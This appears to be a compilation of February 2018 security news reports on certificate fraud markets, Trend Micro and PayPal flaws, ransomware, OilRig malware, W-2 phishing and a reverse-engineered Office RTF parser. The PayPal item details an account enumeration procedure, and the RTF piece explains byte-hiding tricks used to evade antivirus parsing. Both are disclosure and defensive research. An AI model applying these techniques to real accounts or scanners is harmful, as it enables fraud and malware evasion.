“Contrary to a common belief that the security certificates circulating in the criminal underground are stolen from legitimate owners prior to being used in nefarious campaigns, we confirmed with a high degree of certainty that the certificates are created for a specific buyer per request only and are registered using stolen corporate identities, making traditional network security appliances less effective.”

Cybercriminals offer the precious commodity via online shops, when buyers place an order the shop’s operators used stolen identities from a legitimate company and its employees to request the certificate for a fake app or website to the CAs (i.e. Comodo, Thawte, and Symantec). The certificates are used to encrypt HTTPS traffic or sign apps.

Recorded Future’s Insikt Group investigated the criminal ecosystem and identified vendors currently offering both code signing certificates and domain name registration with accompanying SSL certificates.

The researchers identified four well-known vendors operating since 2011, only two vendors are currently still active in Russian-speaking crime forums.

“One of the first vendors to offer counterfeit code signing certificates was known as C@T, a member of a prolific hacking messaging board.” continues the report. “In March 2015, C@T offered for sale a Microsoft Authenticode capable of signing 32/64b versions of various executable files, as well as Microsoft Office, Microsoft VBA, Netscape Object Signing, and Marimba Channel Signing documents, and supported Silverlight 4 applications. Additionally, Apple code signing certificates were also available.”

code-signing-certificates

Prices for code-signing certificates range from $299 to $1,799, most expensive items are the fully authenticated domains with EV SSL encryption and code signing capabilities.

“Standard code signing certificates issued by Comodo that do not include SmartScreen reputation rating cost $295. A buyer interested in the most trusted version of an EV certificate issued by Symantec would have to pay $1,599, a 230 percent premium compared to the price of the authentic certificate.” continues the report.

“For those seeking to purchase in bulk, fully authenticated domains with EV SSL encryption and code signing capabilities could also be arranged for $1,799”

code-signing certificates offer

According to recorded future, code signing certificates are not widespread among malware developers due to the high price.

Vxers prefer to pay less for other AV evasion tools, such as crypters (readily available at $10-$30)that represent an excellent compromise between cost and effectiveness

“Unlike ordinary crypting services readily available at $10-$30 per each encryption, we do not anticipate counterfeit certificates to become a mainstream staple of cybercrime due to its prohibitive cost.” concluded the report. “However, undoubtedly, more sophisticated actors and nation-state actors who are engaged in less widespread and more targeted attacks will continue using fake code signing and SSL certificates in their operations”


Dozen vulnerabilities discovered in Trend Micro Linux-based Email Encryption Gateway
25.2.2018 securityafffairs 
Vulnerebility

Security researchers at Core Security have discovered a dozen vulnerabilities in Trend Micro Linux-based Email Encryption Gateway.
Security researchers at Core Security have discovered a dozen flaws in Trend Micro Linux-based Email Encryption Gateway, some of them have been rated as critical and high severity. The flaws received the CVE identification numbers CVE-2018-6219 through CVE-2018-6230.

The most severe flaw could be exploited by a local or remote attacker with access to the targeted system to execute arbitrary commands with root privileges.

“Encryption for Email Gateway [1] is a Linux-based software solution providing the ability to perform the encryption and decryption of email at the corporate gateway, regardless of the email client, and the platform from which it originated. The encryption and decryption of email on the TMEEG client is controlled by a Policy Manager that enables an administrator to configure policies based on various parameters, such as sender and recipient email addresses,” states Core Security.

“Multiple vulnerabilities were found in the Trend Micro Email Encryption Gateway web console that would allow a remote unauthenticated attacker to gain command execution as root.”

Trend Micro Email Encryption Gateway

The most serious vulnerability is CVE-2018-6223, it is related to missing authentication for appliance registration. Administrators can configure the virtual appliance running Email Encryption Gateway during the deployment process upon deployment via a registration endpoint.

The researchers discovered that attackers can access the endpoint without authentication to set administrator credentials and make other changes to the configuration.

“The registration endpoint is provided for system administrators to configure the virtual appliance upon deployment. However, this endpoint remains accessible without authentication even after the appliance is configured, which would allow attackers to set configuration parameters such as the administrator username and password.” continues the analysis.

The experts also discovered two high severity cross-site scripting (XSS) vulnerabilities, an arbitrary file write issue that can lead to command execution, am arbitrary log file locations leading command execution, and unvalidated software updates.

Remaining flaws discovered by the researchers include SQL and XML external entity (XXE) injections.

Affected Packages are Trend Micro Email Encryption Gateway 5.5 (Build 1111.00) and earlier, Trend Micro addressed ten of the vulnerabilities with the version 5.5 build 1129.

According to the report timeline, Trend Micro spent more than six months to issue the patches.

2017-06-05: Core Security sent an initial notification to Trend Micro, including a draft advisory.
2017-11-13: Core Security asked again (4th time) for an ETA for the official fix. We stated we need a release date or a thorough explanation on why after five months there is still no date defined. If there is no such answer we will be forced to publish the advisory.
2018-02-21: Advisory CORE-2017-0006 published.
Trend Micro confirmed that a medium severity CSRF issue and a low severity SQL injection vulnerability have not been patched due to the difficulties of implementing a fix.


Czech President wants Russian hacker Yevgeni Nikulin extradited to Russia instead of US
25.2.2018 securityafffairs  BigBrothers

Czech President Milos Zeman wants the Russian hacker Yevgeni Nikulin to be extradited to Russia instead of the US, he is charged with hacking against social networks and frauds.
Yevgeni Nikulin (29) was requested by the US for alleged cyber attacks on social networks and by the Russian authorities that charged him with frauds.

According to US authorities, the man targeted LinkedIn and Formspring and hacked into the file hosting service Dropbox.

The Russian criminal was arrested in Prague in October 2016 in an international joint operation with the FBI.

The case in the middle of an arm wrestling between Moscow and Washington, the US Government are accusing Russia to have interfered with 2016 Presidential election through hacking.

Yevgeni Nikulin
Source: US Defense Watch.com

In May, a Czech court ruled that Nikulin can be extradited to either Russia or the United States, leaving the final decision to the Justice Minister Robert Pelikan.

“It is true there have been two meetings this year where the president asked me not to extradite a Russian citizen to the United States but to Russia,” the website of the weekly newspaper Respekt quoted Pelikan as saying.

In 2016, Pelikan did not allow to extradite two Lebanese citizens charged by US court with several crimes, including the sale of ground-to-air missiles and cocaine trafficking.

“Respekt also quoted Babis, who professes a strong pro-EU and NATO stance, as saying earlier this month he would prefer Nikulin to be sent to the United States, but had no power over the decision. His spokeswoman declined comment.” reported the New York Times.

Zeman was re-elected in January, he is known for his pro-Russian line and its opposition to Western sanctions imposed on Russia over its 2014 annexation of Crimea.

The Respekt site said last week Pelikan received Vratislav Mynar, the head of Zeman’s office.

“It’s none of your business, but I have handed the minister a letter from the detained Nikulin’s mother,” Mynar told aktualne.cz.

Nikulin’s lawyer Martin Sadilek told AFP that Nikulin alleges that FBI investigators had tried twice to persuade him to confess to cyberattacks on the DNC.


Paypal issue allows disclosure of account balance and recent transactions
24.2.2018 securityaffairs Safety

Paypal issue allows for enumeration of the last four digits of payment method and for the disclosure of account balance and recent transactions of any given PayPal account.
Introduction
This post details an issue which allows for enumeration of the last four digits of payment method (such as a credit or debit card) and for the disclosure of account balance and recent transactions of any given PayPal account.

This attack was submitted to PayPal’s bug bounty program where it was classified as being out of scope, which is something that would admittedly be unavailing to refute since their program scope does not mention anything about attacks on their interactive voice response system.

PayPal ticket

Prerequisites and Reconnaissance
In order to get started, the attacker would require knowledge of two pieces of information pertaining to an account, which would be the e-mail address and phone number linked to it.

Armed with knowledge of the e-mail address and phone number linked to an account, the attacker would visit the Forgot Password page on PayPal’s website, and enter the e-mail address associated with the targeted account.

The attacker would then be presented with the type of card linked to the account, as well as the last two digits of the same.

PayPal - Forgot Password

Attacking the Interactive Voice Response System
On first glance, the interactive voice response system on PayPal’s phone-based customer support seemingly allows for a maximum of three attempts at submitting the correct last four digits per phone call.

However, if the first attempt at submission is incorrect, the caller will not be notified of a successful submission in subsequent attempts made during the same phone call. This makes any additional attempts given to a caller during the same phone call completely cosmetic.

To get around this presumed limitation, the attacker would have to make only one attempt at submitting a possible combination of the last four digits per phone call.

PayPal - Customer Support

Additionally, limiting the number of attempts to one submission per phone call makes the task of enumerating the correct combination much more time-efficient, and not to mention, it allows for easily distinguishing between a correct attempt and an incorrect one.

Furthermore, upon have tested this theory with my own account, I have been able to conclude that there is no limit on the number of submission attempts which can be made in this manner, meaning that hypothetically, an attacker could call 100,000 times to enumerate the last four digits entirely on their own.

That would, however, be disregarding the last two digits retrieved from the Forgot Password page, the knowledge of which effectively makes the attack much more feasible–by reducing the number of possible combinations from 100,000 to just 100.

Once the correct combination of the last four digits has been found, the attacker would simply have to use the interactive voice response system to retrieve information about the account.

After having entered the correct last four digits, the account’s current balance will automatically read off by the machine.

Additionally, to retrieve information about recent transactions, an attacker would simply have to say “recent transactions”, and the same would then be read off.

Attack Efficacy and Efficiency
If the aforementioned prerequisites have been met, an attacker would without fail have the ability to enumerate the correct last four digits of the payment method linked to an account. This information could then further be used to retrieve the account’s current balance and recent transactions as well.

Moreover, after having timed various attempts at submission of the last four digits, it was found that an attempt at submission would on average take around 30 seconds. The fastest possible time would be 27 seconds per phone call.

If we take the fastest possible time as our average, enumerating all possible combinations from 00XX to 99XX would take at most around 45 minutes. This time could then be halved by adding another phone in the mix to consecutively make calls with.

Possible Fixes
Users should be allowed to opt for privacy settings which keep the amount of data revealed on the Forgot Password page to a minimum. This would be similar to how Twitter allows its users to hide information about the email address and/or phone number linked to their account when attempting to reset its password.

It would also be similar to how Facebook allows users to choose whether their full names show up or not when their e-mail address is entered on the password reset page.

Perhaps some measures could be deployed where the last two digits of credit or debit card, if they need to be shown at all, are only shown when the request matches a certain criteria, such as if/when the request has been made from a recognizable device or location.

Conclusion
This issue allows for enumeration of the last four digits of the payment method on an account, which then allows for the disclosure of the account’s current balance and recent transactions.

An attacker with knowledge of the targeted account’s email address and phone number would first use PayPal’s Forgot Password page to retrieve the last two digits of the payment method linked to the account.

The attacker would then be able to accurately enumerate the last four–or rather the first two of the last four digits–of the payment method on the account by making phone calls to PayPal’s phone-based customer support and interacting with the interactive voice response system.

Once the attacker has successfully enumerated the last four digits of credit/debit card or bank account linked to the account, they would then be able to query the current account balance and recent transaction information at will.

Lastly, I would like to note that since there is no human interaction required or involved in the attack, it would essentially be a backdoor into PayPal accounts–allowing attackers to query current account balance and recent transaction information of any given account, at any time.


Czech President Wants Hacker 'Extradited to Russia' Not US
24.2.2018 securityweek BigBrothers

The Czech Republic's pro-Moscow president has repeatedly lobbied for a Russian hacker held in Prague and wanted by the US to be extradited to Russia, the justice minister was quoted as saying Saturday.

Yevgeni Nikulin, sought by the US for alleged cyberattacks on social networks and also by his native Russia on fraud charges, has been in a Prague prison since he was arrested in the Czech capital in October 2016 in a joint operation with the FBI.

The case comes amid accusations by Washington that Russia tried to "interfere" through hacking in the 2016 US election won by Donald Trump, charges the Kremlin has dismissed.

Last May, a Prague court ruled that the 30-year-old Nikulin can be extradited to either Russia or the United States, with the final say left to Justice Minister Robert Pelikan.

"It's true that there have been two meetings this year at which the president (Milos Zeman) asked me to extradite a Russian citizen not to the United States, but to Russia," Pelikan told the aktualne.cz news site.

The site said the meetings had taken place in January, while earlier this week Pelikan received Vratislav Mynar, the head of Zeman's office, who also lobbied for Nikulin's extradition to Russia.

"It's none of your business, but I have handed the minister a letter from the detained Nikulin's mother," Mynar told aktualne.cz.

Zeman's spokesman Jiri Ovcacek declined to comment on the matter when asked by AFP.

Following Nikulin's arrest, Moscow accused Washington of harassing its citizens and vowed to fight Nikulin's extradition.

It then issued a separate arrest warrant for him over alleged theft from the WebMoney settlement system.

The US has charged Nikulin with hacking into social networks LinkedIn and Formspring and into the file hosting service Dropbox, Nikulin's lawyer Martin Sadilek told AFP earlier.

He also said Nikulin alleges that FBI investigators had tried twice to persuade him to confess to cyberattacks on the US Democratic Party.

Zeman, a 73-year-old ex-communist with strong pro-Russian, pro-Chinese and anti-Muslim views, won a second five-year term in a presidential vote in January.


2,000 Computers at Colorado DOT were infected with the SamSam Ransomware
24.2.2018 securityaffairs
Ransomware

SamSam Ransomware hit the Colorado DOT, The Department of Transportation Agency Shuts Down 2,000 Computers after the infection.
SamSam ransomware made the headlines again, this time it infected over 2,000 computers at the Colorado Department of Transportation (DOT).

The DOT has shut down the infected workstations and is currently working with security firm McAfee to restore the ordinary operations. Officials confirmed the ransomware requested a bitcoin payment.

“The Colorado Department of Transportation has ordered an estimated 2,000 employees to shut down their computers following a ransomware attack Wednesday morning.” wrote the CBS Denver.

The CDOT spokesperson Amy Ford said employees were instructed to turn off their computers at the start of business Wednesday after ransomware infiltrated the CDOT network.

“We’re working on it right now,” added Ford.

The good news is that crucial systems at the Colorado DOT such as surveillance cameras, traffic alerts were not affected by the ransomware.

David McCurdy, OIT’s Chief Technology Officer, issued the following statement:

“Early this morning state security tools detected that a ransomware virus had infected systems at the Colorado Department of Transportation. The state moved quickly to quarantine the systems to prevent further spread of the virus. OIT, FBI and other security agencies are working together to determine a root cause analysis. This ransomware virus was a variant and the state worked with its antivirus software provider to implement a fix today. The state has robust backup and security tools and has no intention of paying ransomware. Teams will continue to monitor the situation closely and will be working into the night.”

The Colorado DOT officials confirmed that the agency will not pay the ransom and it will restore data from backups.

The SamSam ransomware is an old threat, attacks were observed in 2015 and the list of victims is long, many of them belong to the healthcare industry. The attackers spread the malware by gaining access to a company’s internal networks by brute-forcing RDP connections.

Among the victims of the Samsam Ransomware there is the MedStar non-profit group that manages 10 hospitals in the Baltimore and Washington area. Crooks behind the attack on MedStar requested 45 Bitcoins (about US$18,500) for restoring the encrypted files, but the organization refused to pay the Ransom because it had a backup of the encrypted information.

In April 2016, the FBI issued a confidential urgent “Flash” message to the businesses and organizations about the Samsam Ransomware.

Back to the present, the Samsam Ransomware made the headlines in the first days of 2018, the malicious code infected systems of some high-profile targets, including hospitals, an ICS firm, and a city council.

SamSam ransomware


Iran-linked group OilRig used a new Trojan called OopsIE in recent attacks
24.2.2018 securityaffairs BigBrothers  APT

According to malware researchers at Palo alto Networks, the Iran-linked OilRig APT group is now using a new Trojan called OopsIE.
The Iran-linked OilRig APT group is now using a new Trojan called OopsIE, experts at Palo Alto Networks observed the new malware being used in recent attacks against an insurance agency and a financial institution in the Middle East.

One of the attacks relied on a variant of the ThreeDollars delivery document, the same malicious document was sent by the threat actor to the UAE government to deliver the ISMInjector Trojan.

In the second attack detected by PaloAlto, the OilRig hackers attempted to deliver the malicious code via a link in a spear phishing message.

“On January 8, 2018, Unit 42 observed the OilRig threat group carry out an attack on an insurance agency based in the Middle East. Just over a week later, on January 16, 2018, we observed an attack on a Middle Eastern financial institution. In both attacks, the OilRig group attempted to deliver a new Trojan that we are tracking as OopsIE.” reads the analysis from Palo Alto Networks.

The first attack occurred on January 8, 2018, the hackers sent two emails to two different email addresses at the target organization within a six minutes time span. Attackers spoofed the email address associated with the Lebanese domain of a major global financial institution.

OilRig launched another attack on January 16, in this case, the attackers downloaded the OopsIE Trojan from the command and control (C&C) server directly. The same organization was hit by OilRig for the second time, the first attacks occurred in 2017.

The researchers explained that the malware is packed with SmartAssembly and obfuscated with ConfuserEx.

The hackers gain persistence by creating a VBScript file and a scheduled task to run itself every three minutes. The OopsIE Trojan communicates with the C&C over HTTP by using the InternetExplorer application object.

“By using the InternetExplorer application object, all C2 related requests will look as if they came from the legitimate browser and therefore will not contain any anomalous fields within the request, such as custom User-Agents. The OopsIE Trojan is configured to use a C2 server hosted at:

www.msoffice365cdn[.]com” states the analysis.

“The Trojan will construct specific URLs to communicate with the C2 server and parses the C2 server’s response looking for content within the tags <pre> and </pre>. The initial HTTP request acts as a beacon”

OilRig

The Trojan can run a command, upload a file, or download a specified file.

Oilrig will continue to adapt its tactics, the experts believe that it will remain a highly active threat actor in the Middle East region.

“This group has repeatedly shown evidence of a willingness to adapt and evolve their tactics, while also reusing certain aspects as well. We have now observed this adversary deploy a multitude of tools, with each appearing to be some form of iterative variation of something used in the past. However, although the tools themselves have morphed over time, the plays they have executed in their playbook largely remain the same when examined over the attack life cycle,” Palo Alto concludes.


FBI warns of spike in phishing campaigns to gather W-2 information
24.2.2018 securityaffairs BigBrothers

The FBI is warning of a spike in phishing campaigns aimed to steal W-2 information from payroll personnel during the IRS’s tax filing season.
The FBI has observed a significant increase since January of complaints of compromised or spoofed emails involving W-2 information.

“Beginning in January 2017, IRS’s Online Fraud Detection & Prevention (OFDP), which monitors for suspected IRS-related phishing emails, observed an increase in reports of compromised or spoofed emails requesting W-2 information.” states the alert published by the FBI.

W-2 information is a precious commodity for crooks that are showing an increasing interest in tax data.

Law enforcement and security experts observed many variations of IRS and tax-related phishing campaigns, but most effective are mass data thefts, for example, campaigns targeting Human Resource (HR) professionals.

“The most popular method remains impersonating an executive, either through a compromised or spoofed email in order to obtain W-2 information from a Human Resource (HR) professional within the same organization.” continues the alert.

“Individual taxpayers may also be the targeted, but criminals have evolved their tactics to focus on mass data thefts.”

w-2 information

A separate warning od W-2 -related phishing campaigns was issued by the Internal Revenue Service.

“The Form W-2 scam has emerged as one of the most dangerous phishing emails in the tax community. During the last two tax seasons, cybercriminals tricked payroll personnel or people with access to payroll information into disclosing sensitive information for entire workforces.” reads the IRS’s advisory issued in January. “The scam affected all types of employers, from small and large businesses to public schools and universities, hospitals, tribal governments and charities.”

Once cyber criminal obtained the W-2 information, they will request a wire transfer, unfortunately, in the case of businesses and organizations the scam is not discovered for weeks or months.

“The initial email may be a friendly, “hi, are you working today” exchange before the fraudster asks for all Form W-2 information. In several reported cases, after the fraudsters acquired the workforce information, they immediately followed that up with a request for a wire transfer.” continues the advisory.

“In addition to educating payroll or finance personnel, the IRS and Security Summit partners also urge employers to consider creating a policy to limit the number of employees who have authority to handle Form W-2 requests and that they require additional verification procedures to validate the actual request before emailing sensitive data such as employee Form W-2s.”

Phishing scams related W-2 information have been increasing, the number of reports regarding this criminal practice from both victims and non-victims jumped from over 100 in 2016 up to roughly 900 in 2017, The IRS confirmed that more than 200 employers were victimized in 2017.

“Reports to phishing@irs.gov from victims and nonvictims about this scam jumped to approximately 900 in 2017, compared to slightly over 100 in 2016. Last year, more than 200 employers were victimized, which translated into hundreds of thousands of employees who had their identities compromised.” continues the alert.

Let me close with recommendations published by the FBI to avoid being victims of W-2 phishing scams and BEC:

Limit the number of employees within a business who have the authority to approve and/or conduct wire transfers and handle W-2 related requests or tasks
Use out of band authentication to verify requests for W-2 related information or wire transfer requests that are seemingly coming from executives. This may include calling the executive to obtain verbal verification, establishing a phone Personal Identification Number (PIN) to verify the executive’s identity, or sending the executive via text message a one-time code and a phone number to call in order to confirm the wire transfer request
Verify a change in payment instructions to a vendor or supplier by calling to verbally confirm the request. The phone number should not come from the electronic communication, but should instead be taken from a known contact list for that vendor
Maintain a file, preferably in non-electronic form, of vendor contact information for those who are authorized to approve changes in payment instructions
Delay the transaction until additional verifications can be performed such as having staff wait to be contacted by the bank to verify the wire transfer
Require dual-approval for any wire transfer request involving one or more of the following:
A dollar amount over a specific threshold
Trading partners who have not been previously added to a “white list” of approved trading partners to receive wire payments
New trading partners
New bank and/or account numbers for current trading partners
Wire transfers to countries outside of the normal trading pattern


Disappearing bytes: Reverse engineering the MS Office RTF parser
24.2.2018 Kaspersky
Exploit
Microsoft Office was a prime target for attacks in 2017. As well as the large number of vulnerabilities discovered and proof-of-concept exploits published, malware authors felt it necessary to prevent detection of ‘one-day’ and ‘old-day’ exploits by antivirus software. It also became clear that using RTF parsing features and peculiarities are no longer enough to effectively evade detection. Along with the rise of MS Office exploitation, when RTF is used as a container for an exploit, we encountered lots of samples that were ‘exploiting’ the implementation of Microsoft Word’s RTF parser to confuse all other third-party RTF parsers, including those used in AV software.

To achieve parsing exactly like that in MS Office, we needed to reverse-engineer it.

I decided to look first at MS Office 2010, because when it comes to parsing it’s better to look at an older implementation. I then compared my findings with those found in newer versions.

An RTF parser comprises a state machine with 37 states, 22 of which are unique:

We’ll look at the most significant states and those that have an influence on the parsing of \objdata, a destination control word that contains the object data. Microsoft OLE links, Microsoft OLE embedded objects, and Macintosh Edition Manager subscriber objects are represented in RTF as objects. These states are:

enum

{

PARSER_BEGIN = 0,

PARSER_CHECK_CONTROL_WORD = 2,

PARSER_PARSE_CONTROL_WORD = 3,

PARSER_PARSE_CONTROL_WORD_NUM_PARAMETER = 4,

PARSER_PARSE_HEX_DATA = 5,

PARSER_PARSE_HEX_NUM_MSB = 7,

PARSER_PARSE_HEX_NUM_LSB = 8,

PARSER_PROCESS_CMD = 0xE,

PARSER_END_GROUP = 0x10,

// …

};

Microsoft Office is shipped without debug symbols, meaning it wasn’t possible to recover the original state names. However, I believe I’ve chosen suitable names according to their underlying functionality.

The first state executed on an opened RTF file is PARSER_BEGIN. In most cases, it’s also executed after processing a control word. The main goal of this state is to determine the next state according to encountered char, destination, and other values stored in the ‘this’ structure and set by control word processors. By default the next state is PARSER_CHECK_CONTROL_WORD.

case PARSER_BEGIN:

// … – checks that we dont need

while (data.pos != data.end)

{

byte = *(uint8_t*)data.pos;

data.pos++;

if (this->bin_size > 0)

{

goto unexpected_char;

}

// …

if (byte == 9)

{

// …

continue;

}

if (byte == 0xA || byte == 0xD)

{

// …

break;

}

if (byte == ‘\\’)

{

uint8_t byte1 = *(uint8_t*)data.pos;

if (byte1 == ‘\”)

{

if (this->destination == listname ||

this->destination == fonttbl ||

this->destination == revtbl ||

this->destination == falt ||

this->destination == leveltext ||

this->destination == levelnumbers ||

this->destination == liststylename ||

this->destination == protusertbl ||

this->destination == lsdlockedexcept)

goto unexpected_char;

state = PARSER_CHECK_CONTROL_WORD;

// …

break;

}

if (byte1 == ‘u’)

{

// …

break;

}

state = PARSER_CHECK_CONTROL_WORD;

// …

break;

}

if (byte == ‘{‘)

{

create_new_group();

// …

break;

}

if (byte == ‘}’)

{

state = PARSER_END_GROUP;

break;

}

unexpected_char:

// it will set next state depending on destination / or go to unexpected_cmd to do more checks and magic

// …

if (this->destination == pict ||

this->destination == objdata ||

this->destination == objalias ||

this->destination == objsect ||

this->destination == datafield ||

this->destination == fontemb ||

this->destination == svb ||

this->destination == macro ||

this->destination == tci ||

this->destination == datastore ||

this->destination == mmconnectstrdata ||

this->destination == mmodsoudldata ||

this->destination == macrosig)

{

state = PARSER_PARSE_HEX_DATA;

data.pos–;

break;

}

// …

break;

}

break;

PARSER_CHECK_CONTROL_WORD will check if the next char is the start of a control word or if it’s a control symbol, and will set the next state accordingly.

case PARSER_CHECK_CONTROL_WORD:

byte = *(uint8_t*)data.pos;

if ((byte >= ‘a’ && byte <= ‘z’) || (byte == ‘ ‘) || (byte >= ‘A’ && byte <= ‘Z’))

{

state = PARSER_PARSE_CONTROL_WORD;

this->cmd_len = 0;

}

else

{

data.pos++;

this->temp[0] = 1;

this->temp[1] = byte;

this->temp[2] = 0;

state = PARSER_PROCESS_CMD;

this->cmd_len = 1;

break;

}

The states PARSER_PARSE_CONTROL_WORD and PARSER_PARSE_CONTROL_WORD_NUM_PARAMETER will store the null-terminated control word that is made up of ASCII alphabetical characters and a null-terminated numeric parameter (if it exists) in a temporary buffer of a fixed size.

case PARSER_PARSE_CONTROL_WORD:

pos = this->temp + 1;

parsed = this->temp + 1;

while (data.pos != data.end)

{

byte = *(uint8_t*)data.pos;

// length of null-terminated strings cmd + num should be <= 0xFF

if ((byte == ‘-‘) || (byte >= ‘0’ && byte <= ‘9’))

{

//if parsed == temp_end

// goto raise_exception

*parsed = 0;

parsed++;

pos = parsed;

if (parsed >= temp_end)

{

parsed = temp_end – 1;

*parsed = 0;

state = PARSER_PROCESS_CMD;

this->cmd_len = pos – (this->temp + 1);

break;

}

data.pos++;

this->cmd_len = pos – (this->temp + 1);

*parsed = byte;

parsed++;

pos = parsed;

state = PARSER_PARSE_CONTROL_WORD_NUM_PARAMETER;

break;

}

if (byte == ‘ ‘)

{

data.pos++;

if (parsed >= temp_end)

{

parsed = temp_end – 1;

}

*parsed = 0;

state = PARSER_PROCESS_CMD;

this->cmd_len = pos – (this->temp + 1);

break;

}

if ((byte >= ‘a’ && byte <= ‘z’) || (byte >= ‘A’ && byte <= ‘Z’))

{

if (parsed – this->temp >= 0xFF)

{

if (parsed >= temp_end)

{

parsed = temp_end – 1;

}

*parsed = 0;

state = PARSER_PROCESS_CMD;

this->cmd_len = pos – (this->temp + 1);

break;

}

//if parsed == temp_end

// goto raise_exception

*parsed = byte;

parsed++;

pos = parsed;

data.pos++;

}

else

{

if (parsed >= temp_end)

{

parsed = temp_end – 1;

}

*parsed = 0;

state = PARSER_PROCESS_CMD;

this->cmd_len = pos – (this->temp + 1);

break;

}

}

break;

case PARSER_PARSE_CONTROL_WORD_NUM_PARAMETER:

while (data.pos != data.end)

{

byte = *(uint8_t*)data.pos;

// length of null-terminated strings cmd + num should be <= 0xFF

if (byte == ‘ ‘)

{

data.pos++;

if (parsed >= temp_end)

{

parsed = temp_end – 1;

}

*parsed = 0;

state = PARSER_PROCESS_CMD;

break;

}

if (byte >= ‘0’ && byte <= ‘9’)

{

if (parsed – this->temp >= 0xFF)

{

if (parsed >= temp_end)

{

parsed = temp_end – 1;

}

*parsed = 0;

state = PARSER_PROCESS_CMD;

break;

}

//if parsed == temp_end

// goto raise_exception

*parsed = byte;

*parsed++;

data.pos++;

}

else

{

if (parsed >= temp_end)

{

parsed = temp_end – 1;

}

*parsed = 0;

state = PARSER_PROCESS_CMD;

break;

}

}

break;

case PARSER_PROCESS_CMD:

case PARSER_SKIP_DATA:

case PARSER_END_GROUP:

case PARSER_SKIP_DATA_CHECK_B:

case PARSER_SKIP_DATA_CHECK_I:

case PARSER_SKIP_DATA_CHECK_N:

case PARSER_SKIP_DATA_GET_BIN_VAL:

case PARSER_SKIP_DATA_INNER_DATA:

this->state = state;

cmd_parser(&data);

state = this->state;

break;

Then it is processed in the state PARSER_PROCESS_CMD that calls another function responsible for processing control words and control symbols. It takes into account the current state and sets the next state.

There are multiple states responsible for parsing hex-data. The most interesting for us is PARSER_PARSE_HEX_DATA – as you can see, it’s set in PARSER_BEGIN if the destination objdata is set.

case PARSER_PARSE_HEX_DATA:

parsed_data = this->temp;

if (this->bin_size <= 0)

{

while (data.pos != data.end)

{

byte = *(uint8_t*)data.pos;

if (byte == ‘{‘ || byte == ‘}’ || byte == ‘\\’)

{

state = PARSER_BEGIN;

if (parsed_data != this->temp)

{

push_data(parsed_data – this->temp);

parsed_data = this->temp;

}

break;

}

if (this->flag & 0x4000)

{

data.pos++;

continue;

}

if (byte >= ‘0’ && byte <= ‘9’)

{

val = byte – 0x30;

}

else if (byte >= ‘a’ && byte <= ‘f’)

{

val = byte – 0x57;

}

else if (byte >= ‘A’ && byte <= ‘F’)

{

val = byte – 0x37;

}

else if (byte == 9 || byte == 0xA || byte == 0xD || byte == 0x20)

{

data.pos++;

continue;

}

else

{

// show message that there are not enough memory

this->flag |= 0x4000;

data.pos++;

continue;

}

if (this->flag & 0x8000)

{

this->hex_data_byte = val << 4;

this->flag &= 0x7FFF;

}

else

{

if (parsed_data == temp_end)

{

push_data(sizeof(this->temp));

parsed_data = this->temp;

}

this->hex_data_byte |= val;

*parsed_data = this->hex_data_byte;

parsed_data++;

this->flag |= 0x8000;

}

data.pos++;

}

}

else

{

if (this->flag & 0x4000)

{

uint32_t size;

if (this->bin_size <= data.end – data.pos)

{

size = this->bin_size;

}

else

{

size = data.end – data.pos;

}

this->bin_size -= size;

data.pos += size;

}

else

{

while (this->bin_size > 0)

{

if (parsed_data == temp_end)

{

push_data(sizeof(this->temp));

parsed_data = this->temp;

}

byte = *(uint8_t*)data.pos;

*parsed_data = byte;

parsed_data++;

data.pos++;

this->bin_size–;

}

}

}

if (parsed_data != this->temp)

{

push_data(parsed_data – this->temp);

parsed_data = this->temp;

}

break;

This state will parse hexadecimal data and binary data if set.

The states PARSER_PARSE_HEX_NUM_MSB and PARSER_PARSE_HEX_NUM_LSB are used together to parse hex values (data of the \panose control word and \’ control symbol).

case PARSER_PARSE_HEX_NUM_MSB:

this->flag |= 0x8000;

this->hex_num_byte = 0;

state = PARSER_PARSE_HEX_NUM_LSB;

case PARSER_PARSE_HEX_NUM_LSB:

// …

byte = *(uint8_t*)data.pos;

data.pos++;

val = 0;

if (byte – ‘0’ <= 9)

{

val = byte – 0x30;

}

else if (byte – ‘a’ <= 5)

{

val = byte – 0x57;

}

else if (byte – ‘A’ <= 5)

{

val = byte – 0x37;

}

this->hex_num_byte |= val << ((this->flag >> 0xF) << 2);

this->flag = ((~this->flag ^ this->flag) & 0x7FFF) ^ ~this->flag;

if (this->flag & 0x8000)

{

// …

state = PARSER_BEGIN;

}

else

{

break;

}

break;

State reset
Looking at PARSER_PARSE_HEX_NUM_MSB, PARSER_PARSE_HEX_NUM_LSB and PARSER_PARSE_HEX_DATA, it is easy to spot a bug. Even if they use a different variable to store the decoded hex value, they use the same bit to determine which nibble is now decoded – high (most significant bits, or MSB) or low (less significant bits, or LSB). And PARSER_PARSE_HEX_NUM_MSB always resets this bit to MSB.

It is therefore possible to make bytes disappear in the PARSER_PARSE_HEX_DATA context by triggering a change of state to PARSER_PARSE_HEX_NUM_MSB.

For this to work it is enough to put \’XX in the data that comes after the \objdata control word. In this case, when the parser encounters \ in state PARSER_PARSE_HEX_DATA it will return to state PARSER_BEGIN and after that will go to state PARSER_PROCESS_CMD. The handler for the \’ control symbol will not change a destination, but will change the next state to PARSER_PARSE_HEX_NUM_MSB. After PARSER_PARSE_HEX_NUM_MSB and PARSER_PARSE_HEX_NUM_LSB control is transferred back to PARSER_BEGIN and eventually to PARSER_PARSE_HEX_DATA because the destination is still equal to objdata. After all that, the next byte will be decoded as a high nibble.

It is also worth noting that PARSER_PARSE_HEX_NUM_LSB does not check if the provided value is a valid hexadecimal; therefore, after \’ there could be absolutely any two bytes.

This behavior can be observed in the following example:

“f\’cc” will be removed from the final result

When control is transferred for the first time to the PARSER_PARSE_HEX_DATA state, after the \objdata control word is processed, the MSB bit is already set. Let’s look at how it happens and how this example will be processed:

After some reverse engineering of the keyword processing function, I found a list of all the control words and their corresponding structures:

With this information we can locate and look at the objdata constructor:

You can see it sets the MSB bit, allocates a new buffer and replaces the old pointer with a new one. Therefore, the data decoded between two \objdata control words is never used.

“d0cf11e0a1b11ae1” will be removed from the final result

Final destination
We know that if \’ or \objdata is put in data, it will change the output. What about other control words and control symbols? There are more than 1500 of them!

Mostly nothing.

As some control words represent a destination, they can’t be used – they change the objdata destination on their own, and to decode an object the objdata destination is needed.

Other control words do not affect objdata destination.

The only one way to change the destination so that it’s possible to return to the objdata destination without losing previously decoded data is to use special symbols – opening brace ({) and closing brace (}). These symbols indicate the start and end of a group.

When the parser encounters the end of a group in state PARSER_BEGIN, the destination that was set before the start of the group will be restored.

Therefore, by putting {\aftncn FF} after \objdata, FF will not get into the decoded data because FF now applies to the destination aftncn and will be handled according to this destination.

